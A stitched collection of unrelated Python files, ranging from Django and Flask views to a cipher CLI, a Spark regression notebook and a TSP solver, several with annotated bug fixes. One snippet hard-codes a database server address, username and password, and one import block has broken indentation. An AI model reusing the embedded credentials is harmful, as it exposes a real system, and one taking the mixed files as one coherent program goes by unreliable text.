        keypoints (np.ndarray): [17, 2] 17 points by coco format with x, y.
        image (np.ndarray): [H, W, 3] Image with BGR format.
        radius (int): Radius of circle keypoint to be plot.
        thickness (int): Line thickness between 2 circle keypoint.
        show (bool): Whether to show a plotted image or not.
        save_path (str): Path to save.
    Returns:
        A numpy array plotted image with BGR format.
    """
    canvas = image.copy()
    # One colour per keypoint index: 5 blue, 6 orange, 6 green — the same
    # 17-entry palette the original listed out explicitly.
    palette = [BLUE_COLOR] * 5 + [ORANGE_COLOR] * 6 + [GREEN_COLOR] * 6
    for pair in KEYPOINT_PAIRS:
        idx_a, idx_b = pair[0], pair[1]
        pt_a = tuple(keypoints[idx_a].astype(np.int32))
        pt_b = tuple(keypoints[idx_b].astype(np.int32))
        # Each endpoint is a filled circle (thickness=-1) in its own colour;
        # the connecting segment reuses the first endpoint's colour.
        canvas = cv2.circle(
            img=canvas, center=pt_a,
            color=palette[idx_a], radius=radius, thickness=-1,
        )
        canvas = cv2.circle(
            img=canvas, center=pt_b,
            color=palette[idx_b], radius=radius, thickness=-1,
        )
        canvas = cv2.line(
            img=canvas, pt1=pt_a, pt2=pt_b,
            color=palette[idx_a], thickness=thickness,
        )
    if show:
        # Matplotlib expects RGB, so convert from BGR for display only.
        plt.imshow(cv2.cvtColor(canvas, cv2.COLOR_BGR2RGB))
        plt.axis('off')
        plt.show()
    if save_path is not None:
        cv2.imwrite(save_path, canvas)
    return canvas
|
from django.shortcuts import render
# Create your views here.
# Note: "attandance" is a misspelling of "attendance", but the name is kept
# because URLconf entries and the template path depend on it.
def attandance(request):
    """Render the static attendance page."""
    return render(request,"attandance/attandace_html.html")
|
'''
Created on Nov 26, 2017
@author: ray
'''
from flask import render_template
from . import main
@main.app_errorhandler(404)
def page_not_found(e):
    """Render the custom 404 page for any unmatched route in the app."""
    return render_template('404.html'), 404
@main.app_errorhandler(500)
def internal_server_error(e):
    """Render the custom 500 page when an unhandled exception occurs."""
    return render_template('500.html'), 500
from django.shortcuts import render , redirect
from .models import *
from django.shortcuts import get_object_or_404
from .forms import PostForm ,UserSignUp ,UserLogin
from django.contrib import messages
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from urllib.parse import quote
from django.http import Http404 , JsonResponse
from django.utils import timezone
from django.db.models import Q
from django.contrib.auth import authenticate,login ,logout
# Create your views here.
"""def post_create(request):
post_list = Post.objects.all()
post_filter = Post.objects.filter(title='Noor')
post_get = Post.objects.get(title = "gf")
context={
"user": request.user,
"list": post_list,
"filter": post_filter,
get": post_get
#"random_number":random.re
}
return render(request,'create.html',context) """
def like_button(request,post_id):
    """AJAX endpoint: toggle the current user's like on a post.

    Returns JSON: {"action": "like"|"unlike", "like_count": int}.
    """
    obj=Post.objects.get(id=post_id)
    # get_or_create doubles as the toggle: if the row already existed the
    # user had liked the post before, so this click means "unlike".
    like, created = Like.objects.get_or_create(user=request.user , post=obj)
    if created:
        action="like"
    else:
        action="unlike"
        like.delete()
    # Count after the possible delete so the client receives the new total.
    post_like_count = obj.like_set.all().count()
    context ={
        "action":action,
        "like_count":post_like_count,
    }
    return JsonResponse(context, safe=False)
def usersignup(request):
    """Create an account from the signup form, log the new user in, and
    redirect to the post list; on invalid input, redirect back with errors.
    """
    context ={}
    form = UserSignUp()
    context['form']=form
    if request.method == "POST":
        form = UserSignUp(request.POST)
        if form.is_valid():
            user = form.save(commit=False)
            username = user.username
            # Keep the raw password: set_password() hashes it on the model,
            # but authenticate() below needs the plain text.
            password = user.password
            user.set_password(password)
            user.save()
            auth_user = authenticate(username=username,password=password)
            login(request,auth_user)
            return redirect("posts:list")
        messages.error(request,form.errors)
        return redirect("posts:signup")
    return render(request,'signup.html', context)
def post_detail(request ,slug):
    """Display a single post; future-dated or draft posts are staff-only.

    Raises Http404 when a non-staff, non-superuser requests a hidden post.
    """
    obj=get_object_or_404(Post, slug=slug)
    date =timezone.now().date()
    if obj.publish > date or obj.draft:
        # BUG FIX: the original read `not request.user.is_staff or
        # request.user.is_superuser`, which (by precedence) 404'd for
        # superusers.  The sibling views (post_create/post_update) use
        # `not (is_staff or is_superuser)` — hidden posts are visible to
        # staff AND superusers.
        if not (request.user.is_staff or request.user.is_superuser):
            raise Http404
    if request.user.is_authenticated():
        if Like.objects.filter(post=obj,user=request.user).exists():
            like=True
        else :
            like = False
    post_like_count = obj.like_set.all().count()
    user_like_count = request.user.like_set.all().count()
    context ={
        "object":obj,
    }
    return render(request,'post_detail.html',context)
def user_login(request):
    """Authenticate a user from the login form.

    On success, logs the user in and redirects to the post list; on bad
    credentials or an invalid form, shows an error and redirects back to
    the login page.
    """
    context ={}
    form = UserLogin()
    context['form']=form
    if request.method == "POST":
        form = UserLogin(request.POST)
        if form.is_valid():
            username=form.cleaned_data['username']
            password=form.cleaned_data['password']
            auth_user = authenticate(username=username,password=password)
            # BUG FIX: the original called login() unconditionally (crashing
            # when authenticate() returned None for bad credentials), and its
            # bad-credentials branch was unreachable dead code that referenced
            # an undefined variable (`author_user`).
            if auth_user is not None:
                login(request,auth_user)
                return redirect("posts:list")
            messages.error(request,"Wrong username/password combination. Please try again.")
            return redirect("posts:login")
        messages.error(request,form.errors)
        return redirect("posts:login")
    return render(request,'login.html', context)
def userlogout(request):
    """Log the current user out and send them to the login page."""
    logout(request)
    return redirect("posts:login")
def post_list(request):
    """List published posts (all posts for staff), with search and paging."""
    today = timezone.now().date()
    if request.user.is_staff or request.user.is_superuser:
        obj_list = Post.objects.all()
    else:
        # Regular visitors only see non-draft posts already published.
        obj_list = Post.objects.filter(draft=False).filter(publish__lte=today)
    query = request.GET.get("q")
    if query:
        # Free-text search across title, body and author name.
        obj_list=obj_list.filter(
                Q(title__icontains=query)|
                Q(content__icontains=query)|
                Q(author__first_name__icontains=query)|
                Q(author__last_name__icontains=query)
                ).distinct()
    paginator = Paginator(obj_list, 4) # Show 4 posts per page
    page = request.GET.get('page')
    try:
        obj = paginator.page(page)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        obj = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999), deliver last page of results.
        obj = paginator.page(paginator.num_pages)
    context = {
        "post_list": obj,
        "today": today,
    }
    return render(request, 'post_list.html', context)
def post_create(request):
    """Staff-only: create a new post from PostForm and redirect to the list."""
    if not (request.user.is_staff or request.user.is_superuser):
        raise Http404
    # request.FILES carries any uploaded media for the post.
    form = PostForm(request.POST or None , request.FILES or None)
    if form.is_valid():
        obj =form.save(commit=False)
        # The author is always the logged-in staff member, never form input.
        obj.author = request.user
        obj.save()
        messages.success(request,"OMG! So Cool!")
        return redirect ("posts:list")
    context = {
        "form":form
    }
    return render(request,'post_create.html',context)
def post_update(request,slug):
    """Staff-only: edit an existing post (looked up by slug) via PostForm."""
    if not (request.user.is_staff or request.user.is_superuser):
        raise Http404
    post_object = get_object_or_404(Post , slug=slug)
    # Binding `instance` makes this an update rather than a create.
    form = PostForm(request.POST or None , request.FILES or None ,instance=post_object)
    if form.is_valid():
        form.save()
        #messages.success(request,"Giving it a second thought?")
        return redirect ("posts:list")
    context = {
        "form":form,
        "post_object":post_object,
    }
    return render(request,'post_update.html',context)
def post_delete(request, slug):
    """Superuser-only: delete the post identified by *slug*."""
    if not (request.user.is_superuser):
        raise Http404
    # NOTE(review): Post.objects.get raises DoesNotExist (HTTP 500) for an
    # unknown slug — get_object_or_404 would be friendlier; confirm intent.
    Post.objects.get(slug=slug).delete()
    messages.warning(request ,"Seriously bro?")
    return redirect ("posts:list")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 1 19:20:21 2018
@author: Alicia
"""
def remove_min_from_list(mylist):
    """Remove the first occurrence of the smallest element from *mylist*
    in place and return the (mutated) list; an empty list is returned as-is.
    """
    if not mylist:
        return mylist
    mylist.remove(min(mylist))
    return mylist

print(remove_min_from_list([2,1,34,23,2]))
|
# -*- coding: utf-8 -*-
"""
"""
try:
from collections.abc import Mapping as MappingABC
except ImportError:
from collections import Mapping as MappingABC
from ..utilities.future_from_2 import str, object, repr_compat, unicode
from ..utilities.unique import NOARG
from .deep_bunch import DeepBunch
class TagBunch(object):
    """Attribute-style view over a writable mapping plus named "tag"
    mappings that shadow its structure.

    Items are read and written through attribute or item access on the
    wrapped ``write_dict``.  A special 'gfunc' tag, when present, maps keys
    to zero-argument factories used to lazily generate missing values.
    """
    __slots__ = ('_dict', '_tag_dicts',)
    def __init__(
        self,
        write_dict = None,
        gfunc = None,
        **kwargs
    ):
        if write_dict is None:
            write_dict = DeepBunch()
        self._dict = write_dict
        # Every remaining keyword argument becomes a tag dictionary.
        self._tag_dicts = kwargs
        if gfunc is True:
            self.require_tag('gfunc')
        elif gfunc is not None:
            self.set_tag('gfunc', gfunc)
        return
    @property
    def _gfunc(self):
        return self.get_tag('gfunc')
    def __getitem__(self, key):
        # Lazily generate a missing value via the 'gfunc' tag, if any.
        gfunc = self._tag_dicts.get('gfunc', None)
        if gfunc is not None and (key not in self._dict):
            gval = gfunc.get(key, None)
            if gval is not None:
                item = gval()
                self._dict[key] = item
        item = self._dict[key]
        if isinstance(item, MappingABC):
            # Wrap nested mappings so the matching slice of every tag dict
            # follows them down the tree.
            subtags = {}
            for tagkey, tagdict in list(self._tag_dicts.items()):
                if isinstance(tagdict, MappingABC):
                    try:
                        subtags[tagkey] = tagdict[key]
                    except KeyError:
                        continue
            item = self.__class__(item, **subtags)
        return item
    def __getattr__(self, key):
        try:
            return self.__getitem__(key)
        except KeyError:
            raise AttributeError("'{0}' not in {1}".format(key, self))
    def __setitem__(self, key, item):
        self._dict[key] = item
    def __setattr__(self, key, item):
        # Slot names go on the instance itself; everything else is stored
        # in the wrapped dict.
        if key in self.__slots__:
            return super(TagBunch, self).__setattr__(key, item)
        return self.__setitem__(key, item)
    def __delitem__(self, key):
        del self._dict[key]
    def __delattr__(self, key):
        return self.__delitem__(key)
    def get(self, key, default = NOARG):
        """Like dict.get, but re-raises KeyError when no default is given."""
        try:
            return self[key]
        except KeyError:
            if default is not NOARG:
                return default
            raise
    def setdefault(self, key, default):
        try:
            return self[key]
        except KeyError:
            self[key] = default
            return default
    def get_tag(self, tagkey, default = NOARG):
        """Return the tag dictionary registered under *tagkey*."""
        try:
            return self._tag_dicts[tagkey]
        except KeyError:
            if default is not NOARG:
                return default
            raise
    def has_tag(self, key):
        return key in self._tag_dicts
    def require_tag(self, tagkey):
        """Ensure a (possibly empty) tag dictionary exists for *tagkey*."""
        if tagkey not in self._tag_dicts:
            self._tag_dicts[tagkey] = DeepBunch({})
        return
    def set_tag(self, tagkey, obj):
        self._tag_dicts[tagkey] = obj
        return
    def __contains__(self, key):
        return (key in self._dict)
    def has_key(self, key):
        return key in self
    def __dir__(self):
        items = list(k for k in self._dict.keys() if isinstance(k, (str, unicode)))
        items.sort()
        return items
    @repr_compat
    def __repr__(self):
        return (
            '{0}({1}, {2})'
        ).format(
            self.__class__.__name__,
            self._dict,
            self._tag_dicts,
        )
    def __iter__(self):
        return iter(list(self.keys()))
    def __len__(self):
        return len(self._dict)
    def iterkeys(self):
        return iter(list(self._dict.keys()))
    def keys(self):
        return list(self._dict.keys())
    def itervalues(self):
        for key in list(self.keys()):
            yield self[key]
        return
    def values(self):
        # BUG FIX: was `return list(self.values())` — unbounded recursion.
        return [self[key] for key in list(self.keys())]
    def iteritems(self):
        for key in list(self.keys()):
            yield key, self[key]
        return
    def items(self):
        # BUG FIX: was `return list(self.items())` — unbounded recursion.
        return [(key, self[key]) for key in list(self.keys())]
# Register TagBunch as a virtual subclass so isinstance(x, Mapping) passes.
MappingABC.register(TagBunch)
|
import pypyodbc
# SECURITY(review): database credentials are hard-coded in the connection
# string; move them to environment variables or a config file outside VCS.
sql_server_conn_str = 'Driver={SQL Server Native Client 11.0};Server=172.16.3.65;Database=ArgaamPlus;Uid=argaamplususer;Pwd=argplus123$;'
# sql_server_conn_str = 'Driver={SQL Server Native Client 11.0};Server=172.16.3.51;Database=argaam_analytics;Uid=argplus_user;Pwd=argplus123$;'
conn = pypyodbc.connect(sql_server_conn_str)
cur = conn.cursor()
# cur.execute("{call dbo.SP_Q1_StockEntityWasUpOrDownByPercent(?,?,?,?,?,?)}", (77, 1, 'up', 5, 2001, 2005))
# The ? placeholder keeps this query parameterised (no SQL injection).
cur.execute("select * from companystockpricesarchive where companyid = ?", (77,))
# for d in cur.description:
# print(d)
print("")
for r in cur.fetchall():
    print(r)
#Implement a program to find the euclidean distance of two points.
# Read the two points.  float() accepts decimal as well as whole-number
# input, generalising the original int()-only version; results for
# integer input are unchanged.
x1=float(input("enter x1"))
y1=float(input("enter y1"))
x2=float(input("enter x2"))
y2=float(input("enter y2"))
# Euclidean distance: sqrt((x2-x1)^2 + (y2-y1)^2).
eq=(x2-x1)**2
eq1=(y2-y1)**2
result=(eq+eq1)**0.5
print("the euclidean distance is",result)
|
# 팀 결성.
# 학교에서 0~N 까지의 번호를 부여했다.
# 팀 합치기 연산 -> 두 팀을 합치는 연산.
# 같은 팀 여부 확인 연산 두 학생이 같은 팀에 속하는지 확인하는 연산.abs
# 이 문제 아까 계속 했던 서로소 문제다.
# N은 번호 M은 연산의 개수
# 0 a b 는 팀 합치기 연산
# 0 a b는 같은 팀 여부 확인 연산
def find_parent(parent, x):
    """Return the root representative of x's set, flattening the chain
    (path compression) so later lookups are O(1)-ish."""
    # First pass: walk up to the root.
    root = x
    while parent[root] != root:
        root = parent[root]
    # Second pass: repoint every node on the path directly at the root.
    while parent[x] != root:
        parent[x], x = root, parent[x]
    return root
def union_parent(parent,a,b):
    """Merge the sets containing a and b; the smaller root index becomes
    the parent of the larger one."""
    root_a = find_parent(parent, a)
    root_b = find_parent(parent, b)
    if root_a < root_b:
        parent[root_b] = root_a
    else:
        parent[root_a] = root_b
# Read node count v and operation count e, then process e operations:
#   0 a b -> merge the teams containing a and b
#   1 a b -> print YES if a and b are on the same team, else NO
v,e=map(int,input().split())
parent=[0]*(v+1)
for i in range(1,v+1):
    # Every node starts as its own parent (its own one-person team).
    parent[i]=i
for i in range(e):
    a,b,c=map(int,input().split())
    if a==0:
        union_parent(parent,b,c)
    elif a==1:
        # BUG FIX: the original compared parent[b]==parent[c] directly,
        # which is wrong once union trees are deeper than one level (path
        # compression only flattens paths that were actually traversed).
        # Compare the roots instead.
        if find_parent(parent,b)==find_parent(parent,c):
            print('YES')
        else:
            print('NO')
# standard lib
import sys
from pdb import set_trace
# 3rdparty lib
from PySide2.QtWidgets import QApplication, QDialog
# custom lib
from ui_AddFoodItem import Ui_Dialog
class MainWindow(QDialog):
    """Dialog that lets the user type a food name and add it to a list."""
    def __init__(self):
        super(MainWindow, self).__init__()
        self.ui = Ui_Dialog()
        self.ui.setupUi(self)
        # The "Add" button appends the line-edit text to the list widget.
        self.ui.pushButtonAdd.clicked.connect(self.add_item)
    def add_item(self):
        """Move the typed text into the list, then clear and refocus the box."""
        self.ui.listWidgetSelectedItems.addItem(self.ui.lineEditFood.text())
        self.ui.lineEditFood.clear()
        self.ui.lineEditFood.setFocus()
# Standard Qt bootstrap: create the app, show the dialog, run the event loop.
if __name__ == '__main__':
    app = QApplication([])
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())
|
import re, logging
from pyfiles import jsonChecker, playerController, characterController
from pyfiles.db.attributes import ATTRIBUTE_NAMES
def split_words(text : str) -> list:
    """Break a command input such as 'hello foo bar' into individual words.

    Leading/trailing whitespace is stripped first; splitting is on single
    spaces, so consecutive spaces yield empty strings (same as before).
    """
    return text.strip().split(' ')
def get_command_list() -> list:
    """Return the help strings for every command the parser understands."""
    return ['user [username]', 'say [message]', 'help']
def parse_chat_input(text: str) -> dict:
    """Check chat input formats against command regex matchers.

    Returns {'choice': c, 'chat-data': data} where c is 1 for a login
    ('user NAME'), 2 for a chat message ('say ...'), 3 for 'help' and 0
    for anything unrecognised.  data is {'username': ...} for logins, the
    message text for chat, and None otherwise.
    """
    user_match = re.match(r"user\s[\w]{1,12}", text) #('user [uname]')
    chat_match = re.match(r"say\s([\w\s,.!()?]{1,140})", text) #('say [message]')
    help_match = text == 'help' # plain help command
    choice = 0
    chat_data = None
    #Check for user creation
    if user_match is not None:
        commands = split_words(text)
        #2nd word should be the username i.e "user foo"
        choice = 1
        uname = commands[1]
        logging.info("User login requested for user: " + uname)
        chat_data = {'username':uname}
    #Check for chat message
    elif chat_match is not None:  # idiom fix: was `chat_match != None`
        choice = 2
        chat_data = chat_match.group(1) #all matching text
    elif help_match:
        choice = 3
    return {'choice':choice, 'chat-data':chat_data}
def check_login_message(input_params : dict) -> (bool, dict or None):
    """Validate that parsed login data carries a usable username.

    Returns (True, input_params) when 'chat-data' holds a non-None
    'username', else logs the problem and returns (False, None).
    """
    data = input_params['chat-data']
    if data is not None and data.get('username') is not None:
        return (True, input_params)
    logging.info('Missing (username) in protocol message (Probably not logged in?)')
    return (False, None)
def check_chat_message(input_params: dict) -> (bool, dict or None):
    """Validate that a chat message has both a payload and a sender.

    Returns (True, input_params) when 'chat-data' and 'username' are both
    present and non-None, else (False, None).
    """
    has_data = input_params.get('chat-data') is not None
    has_user = input_params.get('username') is not None
    if has_data and has_user:
        logging.info('User chat message checked (input good)')
        return (True, input_params)
    logging.info('Invalid protocol for chat message')
    return (False, None)
def check_message_params(message : dict) -> (bool, dict):
    """ Sanity checks the JSON protocol messages sent from the client
    JSON message format is {'data': message/login, 'sessionJson': { username, sid, etc} }

    Returns (choice, (ok, params)); choice is -1 when nothing matched.
    """
    logging.info('CHECKING message: '+str(message))
    data_tag = 'data'
    chat_data_tag = 'chat-data'
    param_tag = 'sessionJson'
    if data_tag in message:
        #Send the 'data' from the input to be checked
        extracted_params = parse_chat_input(message[data_tag]) #returns {choice, chat-data or None}
        logging.info('INPUT PARAMS:'+str(extracted_params))
        if extracted_params is None:
            logging.info('Missing (input param data) from protocol message')
        else:
            if 'choice' not in extracted_params or chat_data_tag not in extracted_params:
                logging.info('Missing (choice AND/OR data) in protocol message')
            else:
                choice = extracted_params.pop('choice')
                if choice == 1:
                    return (choice, check_login_message(extracted_params))
                if choice == 2:
                    #Add the session data back onto the result
                    extracted_params.update(message[param_tag])
                    return (choice, check_chat_message(extracted_params))
                if choice == 3:
                    return (choice, (True, None))
    # Fall-through: malformed or unrecognised message.
    return (-1, (None, None))
def validate_character_update(characterJson : dict) -> bool:
    """ Checks we've been given valid data, and that any changes are within limits """
    # Delegates the attribute/field presence check to jsonChecker.
    return jsonChecker.character_details_exist(characterJson, ATTRIBUTE_NAMES)
    #Check for a prexisting character
    #if characterController.find_character(characterJson['data']['charname']) is None:
|
# encoding: utf-8
import sys
import random
from lib import keystreams
def error(message):
    # Print the error plus usage text, then terminate with exit status 1.
    # (Python 2 print-statement syntax — this module is Python 2 only.)
    print message
    print "Usage: python echocrypt.py [e|d] \"message\" [keystream name]"
    exit(1)
# Command-line entry: argv[1] selects encrypt ('e') or decrypt ('d') mode,
# argv[2] is the message, argv[3] the (optionally random) keystream name.
# (Python 2 print-statement syntax throughout.)
mode = sys.argv[1]
if mode == 'e':
    # If the keystream to use is specified, use that one; otherwise, use a random one in the dictionary
    try:
        keystream_name = sys.argv[3]
    except IndexError:
        keystream_name = random.choice(keystreams.total.keys())
    print "Using keystream: %s" % keystream_name
    keystream = keystreams.total[keystream_name]
    try:
        message = sys.argv[2]
    except IndexError:
        error("You must specify a message to encrypt.")
    ciphertext = keystream.encrypt(message)
    print ciphertext
elif mode == 'd':
    try:
        message = sys.argv[2]
    except IndexError:
        error("You must specify a message to decrypt.")
    # Keystream name must be specified in this case
    try:
        keystream_name = sys.argv[3]
    except IndexError:
        error("You must specify a keystream to decrypt with.")
    keystream = keystreams.total[keystream_name]
    plaintext = keystream.decrypt(message)
    print plaintext
# The block below is an old pickle-based prototype kept as a string literal;
# it is never executed.
"""
if mode == 'e' or mode == 'a':
    message = sys.argv[2]
    bin_message = utils.bin_from_string(message) if mode == 'e' else message
    num_chars = len(bin_message)
    total_keystream = pickle.load(open("keystreams"))
    keystream = total_keystream[:num_chars]
    print bin_message
    print "---------"
    print keystream
    # Save it to a file
    pickle.dump(keystream, open("keystream_used", "wb"))
    print "---------"
    ciphertext = bin(int(bin_message, 2) + int(keystream, 2))[2:]
    print ciphertext
elif mode == 's' or mode == 'd':
    ciphertext = sys.argv[2]
    keystream = pickle.load(open("keystream_used"))
    message = bin(int(ciphertext, 2) - int(keystream, 2))[2:]
    if mode == 's':
        num_bits = len(message) / 7
        chars = []
        for i in xrange(num_bits):
            char = chr(int(message[i*7:(i+1)*7], 2))
            chars.append(char)
        print ''.join(chars)
    else:
        print message
"""
|
from gym.wrappers.rescale_action import RescaleAction
from rltk.common.utils import import_class_from_string
from gym.spaces.box import Box
import gym
def make_env(name: str, loader: str = "gym", **kwargs):
    """Build a gym-compatible environment via one of several loaders.

    Args:
        name: environment id ("gym"), import path ("metaworld"), or
            dm_control domain name ("dm_control").
        loader: backend to use: "gym", "metaworld", "dm_control" or
            "atari" (not implemented).
        **kwargs: forwarded to the loader; `rescale_action` (default True)
            wraps continuous action spaces into [-1, 1].

    Returns:
        The constructed (possibly wrapped) environment.
    """
    rescale_action = kwargs.get('rescale_action', True)
    env = None
    if loader == "gym": # Base Wrapper
        try:
            # Optional extra environments; gym.make still works without them.
            from gym_extensions.continuous import mujoco
        except Exception:
            # Was a bare `except:` — narrowed so SystemExit/KeyboardInterrupt
            # are no longer swallowed.
            print('gym_extensions import failure !')
        env = gym.make(name)
    elif loader == "metaworld":
        env = import_class_from_string(name)(**kwargs)
    elif loader == "dm_control":
        import dmc2gym
        # Useful Options: frame_skip, from_pixels
        # Note: dmc2gym normalized the action but still we can
        # use RescaleAction.
        # NOTE: in the future maybe simply return the env.
        env = dmc2gym.make(domain_name=name, **kwargs)
    elif loader == 'atari':
        raise NotImplementedError()
    assert env is not None
    if isinstance(env.action_space, Box) and rescale_action:
        # Environment has continuous space and by default is normalized.
        env = RescaleAction(env, -1, 1)
    return env
|
# Databricks notebook source
# MAGIC %md
# MAGIC # Linear Regression Consulting Project
# COMMAND ----------
# MAGIC %md
# MAGIC Congratulations! You've been contracted by Hyundai Heavy Industries to help them build a predictive model for some ships. [Hyundai Heavy Industries](http://www.hyundai.eu/en) is one of the world's largest ship manufacturing companies and builds cruise liners.
# MAGIC
# MAGIC You've been flown to their headquarters in Ulsan, South Korea to help them give accurate estimates of how many crew members a ship will require.
# MAGIC
# MAGIC They are currently building new ships for some customers and want you to create a model and use it to predict how many crew members the ships will need.
# MAGIC
# MAGIC Here is what the data looks like so far:
# MAGIC
# MAGIC Description: Measurements of ship size, capacity, crew, and age for 158 cruise
# MAGIC ships.
# MAGIC
# MAGIC
# MAGIC Variables/Columns
# MAGIC Ship Name 1-20
# MAGIC Cruise Line 21-40
# MAGIC Age (as of 2013) 46-48
# MAGIC Tonnage (1000s of tons) 50-56
# MAGIC passengers (100s) 58-64
# MAGIC Length (100s of feet) 66-72
# MAGIC Cabins (100s) 74-80
# MAGIC Passenger Density 82-88
# MAGIC Crew (100s) 90-96
# MAGIC
# MAGIC It is saved in a csv file for you called "cruise_ship_info.csv". Your job is to create a regression model that will help predict how many crew members will be needed for future ships. The client also mentioned that they have found that particular cruise lines will differ in acceptable crew counts, so it is most likely an important feature to include in your analysis!
# MAGIC
# MAGIC Once you've created the model and tested it for a quick check on how well you can expect it to perform, make sure you take a look at why it performs so well!
# COMMAND ----------
# Load the cruise-ship CSV with a header row and inferred column types.
dataset = spark.read.format("csv").load("/FileStore/tables/mllib_sample_data/cruise_ship_info.csv", header = True, inferSchema = True)
# COMMAND ----------
from pyspark.ml.linalg import Vectors
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.feature import StringIndexer
from pyspark.ml.feature import OneHotEncoder
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Dealing with Cruise Line column: turn string to index and apply onehot encoding
# COMMAND ----------
# StringIndex + Onehot for the Cruiseline Column:
indexer = StringIndexer(inputCol = 'Cruise_line',
                        outputCol = 'Cruiseline_Index')
indexed = indexer.fit(dataset).transform(dataset)
encoder = OneHotEncoder(inputCols = ['Cruiseline_Index'], outputCols = ['Cruiseline_Onehot'])
encoded = encoder.fit(indexed).transform(indexed)
encoded.show()
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Construct the Feature column for the model by using VectorAssembler
# COMMAND ----------
# Numeric columns plus the one-hot cruise-line vector form the feature vector.
assembler = VectorAssembler(
    inputCols = ['Age', 'Tonnage','passengers','length','cabins','passenger_density', 'Cruiseline_Onehot'],
    outputCol = 'features')
output = assembler.transform(encoded)
# COMMAND ----------
final_data = output.select('features', 'crew')
# COMMAND ----------
# 70/30 train/test split (random, unseeded — results vary run to run).
train_data, test_data = final_data.randomSplit([0.7, 0.3])
# COMMAND ----------
from pyspark.ml.regression import LinearRegression
# COMMAND ----------
lr = LinearRegression(labelCol = 'crew')
lrModel = lr.fit(train_data)
# COMMAND ----------
test_results = lrModel.evaluate(test_data)
# COMMAND ----------
print('RMSE:{}'.format(test_results.rootMeanSquaredError))
print('R2:{}'.format(test_results.r2adj))
# COMMAND ----------
|
# this program calculates the total number of times each word has been tweeted.
import sys
from collections import Counter

# Count how many times each space-separated word appears in the input file
# (argv[1]) and write an aligned "word  count" table to argv[2].
word_count = Counter()
# `with` closes the files even on error; the original leaked the input
# handle entirely (and opened it "r+" despite never writing to it).
with open(sys.argv[1], "r") as infile:
    for line in infile:
        word_count.update(line.strip().split(" "))

# Column width: longest word plus 4 spaces of padding.
width = max(len(word) for word in word_count) + 4
with open(sys.argv[2], "w") as outfile:
    for word in sorted(word_count):
        outfile.write(word.ljust(width))
        outfile.write(repr(word_count[word]))
        outfile.write("\n")
|
from django.db import models
class ContactMessage(models.Model):
    """A message submitted through the site's contact form."""
    title = models.CharField(max_length=100)
    email = models.CharField(max_length=100)
    detail = models.TextField(blank=True,null=True)
    # BUG FIX: was `models.BooleanField(detail=False)` — `detail` is not a
    # valid field option (TypeError at import time).  The flag tracks
    # whether the message has been replied to, defaulting to False.
    reply = models.BooleanField(default=False)
    def __str__(self):
        return self.title
import random
import itertools
import csv
import os.path
from timeit import default_timer as timer
from Point import Point
from Tour import Tour
#<editor-fold desc = "Nearest Neighbor">
def doNearestNeighbor(points):
    """Run the nearest-neighbour heuristic on *points*, printing the tour,
    its length and wall-clock time.  (Python 2 print syntax.)"""
    start = timer()
    tour = nearestNeighbor(points)
    end = timer()
    print 'Nearest Neighbor'
    print 'Path Taken:', tour.toString()
    print 'Distance Traveled: ', tour.pathLength
    print 'Time Taken: ', end - start
def nearestNeighbor(points):
    """Greedy tour: start at points[0], repeatedly hop to the nearest
    unvisited point, then close the loop back to the start.

    Mutates the Point objects' `visited` flags and returns a Tour.
    """
    p0 = p = points[0]
    points[0].visited = True
    i = 0
    tour = Tour(list(), 0)
    tour.path.append(p0)
    while i < len(points)-1:
        i += 1
        # findNearestPoint presumably skips visited points and marks the
        # returned one visited — confirm in the Point implementation.
        nextPoint = p.findNearestPoint(points)
        tour.pathLength += p.distance(nextPoint)
        p = nextPoint
        tour.path.append(p)
    # Close the cycle back to the starting point.
    tour.pathLength += p.distance(p0)
    return tour
#</editor-fold>
#<editor-fold desc = "Exhaustive Search">
def doExhaustiveSearch(points):
    """Run the brute-force optimal search on *points*, printing the tour,
    its length and wall-clock time.  (Python 2 print syntax.)"""
    start = timer()
    tour = exhaustiveSearch(points)
    end = timer()
    print 'Exhaustive Search'
    print 'Path Taken:', tour.toString()
    print 'Distance Traveled: ', tour.pathLength
    print 'Time Taken: ', end - start
def exhaustiveSearch(points):
    """Brute-force optimal tour: fix points[0] as the start and try every
    permutation of the rest.  O(n!) — only viable for small n.

    NOTE(review): this removes points[0] from the caller's list (side
    effect) and relies on the no-argument Tour() starting with a sentinel
    pathLength larger than any real tour — confirm Tour's default.
    """
    p0 = points[0]
    points.remove(p0)
    permutations = itertools.permutations(points)
    bestTour = Tour()
    for perm in permutations:
        dist = calculatePermutationCost(p0, perm)
        if(dist < bestTour.pathLength):
            bestTour.path = perm
            bestTour.pathLength = dist
    # Permutations are tuples; convert and put the fixed start back in front.
    bestTour.path = list(bestTour.path)
    bestTour.path.insert(0, p0)
    return bestTour
def calculatePermutationCost(p0, perm):
    """Total length of the closed tour p0 -> perm[0] -> ... -> perm[-1] -> p0."""
    totalDist = p0.distance(perm[0])
    i = 0
    while i != len(perm)-1:
        totalDist += perm[i].distance(perm[i+1])
        i+=1
    # Close the loop back to the start.
    totalDist += perm[-1].distance(p0)
    return totalDist
#</editor-fold>
#<editor-fold desc="Make/Get points">
def generatePoints(n):
    """Return n distinct random Points with integer coordinates in [0, 100]."""
    points = list()
    random.seed()
    while len(points) < n:
        point = Point(random.randint(0, 100), random.randint(0, 100))
        # Reject duplicates so the tour never has zero-length edges.
        if not any(point.equals(item) for item in points):
            points.append(point)
    return points
def readFile(fileName):
    """Read space-separated "x y" rows from *fileName* into Point objects.

    Rows with fewer than two fields (e.g. the leading count line) are
    skipped.
    """
    points = list()
    with open(fileName, 'r') as file:
        reader = csv.reader(file, delimiter=' ')
        for row in reader:
            if(len(row) > 1):
                x = int(row[0])
                y = int(row[1])
                points.append(Point(x, y))
    return points
def writeFile(points):
    """Write the points to "points.txt": count on the first line, then one
    "x y" pair per line (the format readFile expects)."""
    with open("points.txt", 'w') as file:
        file.write(str(len(points)) + '\n')
        for point in points:
            file.write(str(point.x) + ' ' + str(point.y) + '\n')
#</editor-fold>
def main():
    """Prompt for a point file or a count, then run both TSP strategies.
    (Python 2: raw_input and print-statement syntax.)"""
    userInput = raw_input('Enter a filename or the number of points to generate: ')
    if userInput.isdigit():
        # Generate fresh random points and persist them for reproducibility.
